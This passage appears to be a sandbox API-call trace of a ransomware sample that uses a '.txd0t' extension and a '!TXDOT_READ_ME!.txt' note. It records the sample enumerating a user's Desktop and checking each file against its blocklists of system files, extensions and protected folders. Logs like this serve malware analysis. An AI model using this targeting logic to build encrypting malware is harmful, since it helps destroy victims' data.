psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\rBWrlFNmCY.bmp" [0072.992] SetEvent (hEvent=0x408) returned 1 [0072.998] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37d9fe90, ftCreationTime.dwHighDateTime=0x1d5e7c3, ftLastAccessTime.dwLowDateTime=0xf24c1b0, ftLastAccessTime.dwHighDateTime=0x1d5efd4, ftLastWriteTime.dwLowDateTime=0xf24c1b0, ftLastWriteTime.dwHighDateTime=0x1d5efd4, nFileSizeHigh=0x0, nFileSizeLow=0x16fce, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="RnjQ5ZSPpYJwR3B.jpg", cAlternateFileName="RNJQ5Z~1.JPG")) returned 1 [0072.998] StrCmpW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2=".") returned 1 [0072.998] StrCmpW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="..") returned 1 [0072.998] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.998] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.998] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="RnjQ5ZSPpYJwR3B.jpg", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg") returned="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg" [0072.998] PathFindExtensionW (pszPath="RnjQ5ZSPpYJwR3B.jpg") returned=".jpg" [0072.998] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="bootsect.bak") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="iconcache.db") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="thumbs.db") returned -1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2=" ransomware ") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2=" ransom ") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="debug.txt") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="boot.ini") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="desktop.ini") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="autorun.inf") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="ntuser.dat") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="ntldr") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="ntdetect.com") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="bootfont.bin") returned 1 [0072.998] StrCmpIW (psz1="RnjQ5ZSPpYJwR3B.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.998] PathFindExtensionW (pszPath="RnjQ5ZSPpYJwR3B.jpg") returned=".jpg" [0072.998] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0072.998] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.998] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.998] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0072.998] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.999] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg" [0072.999] SetEvent (hEvent=0x410) returned 1 [0073.004] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3379b30, ftCreationTime.dwHighDateTime=0x1d5eeaa, ftLastAccessTime.dwLowDateTime=0x23f0b1e0, ftLastAccessTime.dwHighDateTime=0x1d5e277, ftLastWriteTime.dwLowDateTime=0x23f0b1e0, ftLastWriteTime.dwHighDateTime=0x1d5e277, nFileSizeHigh=0x0, nFileSizeLow=0x42c0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="RwNhKXau 7hWtmS6.png", cAlternateFileName="RWNHKX~1.PNG")) returned 1 [0073.004] StrCmpW (psz1="RwNhKXau 7hWtmS6.png", psz2=".") returned 1 [0073.004] StrCmpW (psz1="RwNhKXau 7hWtmS6.png", psz2="..") returned 1 [0073.004] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.004] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.004] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="RwNhKXau 7hWtmS6.png", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png") returned="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png" [0073.004] PathFindExtensionW (pszPath="RwNhKXau 7hWtmS6.png") returned=".png" [0073.004] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="bootsect.bak") returned 1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="iconcache.db") returned 1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="thumbs.db") returned -1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2=" ransomware ") returned 1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2=" ransom ") returned 1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="debug.txt") returned 1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="boot.ini") returned 1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="desktop.ini") returned 1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="autorun.inf") returned 1 [0073.004] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="ntuser.dat") returned 1 [0073.005] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="ntldr") returned 1 [0073.005] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="ntdetect.com") returned 1 [0073.005] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="bootfont.bin") returned 1 [0073.005] StrCmpIW (psz1="RwNhKXau 7hWtmS6.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.005] PathFindExtensionW (pszPath="RwNhKXau 7hWtmS6.png") returned=".png" [0073.005] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0073.005] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.005] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.005] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.005] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.005] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png" [0073.005] SetEvent (hEvent=0x418) returned 1 [0073.008] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeff63820, ftCreationTime.dwHighDateTime=0x1d5e374, ftLastAccessTime.dwLowDateTime=0xff2484f0, ftLastAccessTime.dwHighDateTime=0x1d5ea59, ftLastWriteTime.dwLowDateTime=0xff2484f0, ftLastWriteTime.dwHighDateTime=0x1d5ea59, nFileSizeHigh=0x0, nFileSizeLow=0x10796, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="s2-ewyNmBK.gif", cAlternateFileName="S2-EWY~1.GIF")) returned 1 [0073.008] StrCmpW (psz1="s2-ewyNmBK.gif", psz2=".") returned 1 [0073.008] StrCmpW (psz1="s2-ewyNmBK.gif", psz2="..") returned 1 [0073.008] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.008] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.008] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="s2-ewyNmBK.gif", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif") returned="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif" [0073.008] PathFindExtensionW (pszPath="s2-ewyNmBK.gif") returned=".gif" [0073.008] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="bootsect.bak") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="iconcache.db") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="thumbs.db") returned -1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2=" ransomware ") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2=" ransom ") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="debug.txt") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="boot.ini") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="desktop.ini") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="autorun.inf") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="ntuser.dat") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="ntldr") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="ntdetect.com") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="bootfont.bin") returned 1 [0073.008] StrCmpIW (psz1="s2-ewyNmBK.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.009] PathFindExtensionW (pszPath="s2-ewyNmBK.gif") returned=".gif" [0073.009] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0073.009] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.009] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.009] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0073.128] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.128] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\s2-ewyNmBK.gif" [0073.128] SetEvent (hEvent=0x408) returned 1 [0073.128] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x685a7a10, ftCreationTime.dwHighDateTime=0x1d5e744, ftLastAccessTime.dwLowDateTime=0xad94c880, ftLastAccessTime.dwHighDateTime=0x1d5ea2b, ftLastWriteTime.dwLowDateTime=0xad94c880, ftLastWriteTime.dwHighDateTime=0x1d5ea2b, nFileSizeHigh=0x0, nFileSizeLow=0x11219, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SbwWluUpbQiQnJG8qbe.pdf", cAlternateFileName="SBWWLU~1.PDF")) returned 1 [0073.128] StrCmpW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2=".") returned 1 [0073.128] StrCmpW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="..") returned 1 [0073.128] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="SbwWluUpbQiQnJG8qbe.pdf", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf") returned="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf" [0073.128] PathFindExtensionW (pszPath="SbwWluUpbQiQnJG8qbe.pdf") returned=".pdf" [0073.128] StrCmpW (psz1=".pdf", psz2=".txd0t") returned -1 [0073.128] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="bootsect.bak") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="iconcache.db") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="thumbs.db") returned -1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2=" ransomware ") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2=" ransom ") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="debug.txt") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="boot.ini") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="desktop.ini") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="autorun.inf") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="ntuser.dat") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="ntldr") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="ntdetect.com") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="bootfont.bin") returned 1 [0073.129] StrCmpIW (psz1="SbwWluUpbQiQnJG8qbe.pdf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.129] PathFindExtensionW (pszPath="SbwWluUpbQiQnJG8qbe.pdf") returned=".pdf" [0073.129] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pdf") returned 0x0 [0073.129] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.129] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.129] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0073.525] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.525] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf" [0073.525] SetEvent (hEvent=0x410) returned 1 [0073.527] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63b7220, ftCreationTime.dwHighDateTime=0x1d5eb85, ftLastAccessTime.dwLowDateTime=0x34ae9370, ftLastAccessTime.dwHighDateTime=0x1d5e91c, ftLastWriteTime.dwLowDateTime=0x34ae9370, ftLastWriteTime.dwHighDateTime=0x1d5e91c, nFileSizeHigh=0x0, nFileSizeLow=0x16746, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="SJcMEwGL9beIVl4.wav", cAlternateFileName="SJCMEW~1.WAV")) returned 1 [0073.528] StrCmpW (psz1="SJcMEwGL9beIVl4.wav", psz2=".") returned 1 [0073.528] StrCmpW (psz1="SJcMEwGL9beIVl4.wav", psz2="..") returned 1 [0073.528] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.528] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.528] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="SJcMEwGL9beIVl4.wav", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav") returned="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav" [0073.528] PathFindExtensionW (pszPath="SJcMEwGL9beIVl4.wav") returned=".wav" [0073.531] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="bootsect.bak") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="iconcache.db") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="thumbs.db") returned -1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2=" ransomware ") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2=" ransom ") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="debug.txt") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="boot.ini") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="desktop.ini") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="autorun.inf") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="ntuser.dat") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="ntldr") returned 1 [0073.531] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="ntdetect.com") returned 1 [0073.532] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="bootfont.bin") returned 1 [0073.532] StrCmpIW (psz1="SJcMEwGL9beIVl4.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0073.532] PathFindExtensionW (pszPath="SJcMEwGL9beIVl4.wav") returned=".wav" [0073.532] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0073.532] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0073.532] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0073.532] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0073.554] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0073.554] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav" [0073.554] SetEvent (hEvent=0x418) returned 1 [0073.554] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0xa8d8b3a0, ftLastAccessTime.dwHighDateTime=0x1d5eb76, ftLastWriteTime.dwLowDateTime=0xa8d8b3a0, ftLastWriteTime.dwHighDateTime=0x1d5eb76, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="T2UrA", cAlternateFileName="")) returned 1 [0073.554] StrCmpW (psz1="T2UrA", psz2=".") returned 1 [0073.554] StrCmpW (psz1="T2UrA", psz2="..") returned 1 [0073.554] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0073.554] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0073.554] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="T2UrA", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\system32\\") returned 0x0 [0073.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\syswow64\\") returned 0x0 [0073.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\system\\") returned 0x0 [0073.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\windows\\winsxs\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\roaming\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\local\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\appdata\\locallow\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\all users\\microsoft\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="\\inetpub\\logs\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\boot\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\perflogs\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\programdata\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\drivers\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\wsus\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\efstmpwp\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch=":\\$recycle.bin\\") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="crypt_detect") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="cryptolocker") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="ransomware") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\WINDOWS") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\Program Files (x86)") returned 0x0 [0073.555] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop\\T2UrA", lpSrch="C:\\Program Files") returned 0x0 [0073.555] GetProcessHeap () returned 0xe30000 [0073.555] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4bc) returned 0xed36a8 [0073.555] StrCpyNW (in: psz1=0xed36a8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0073.555] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\*", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*" [0073.555] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca249080, 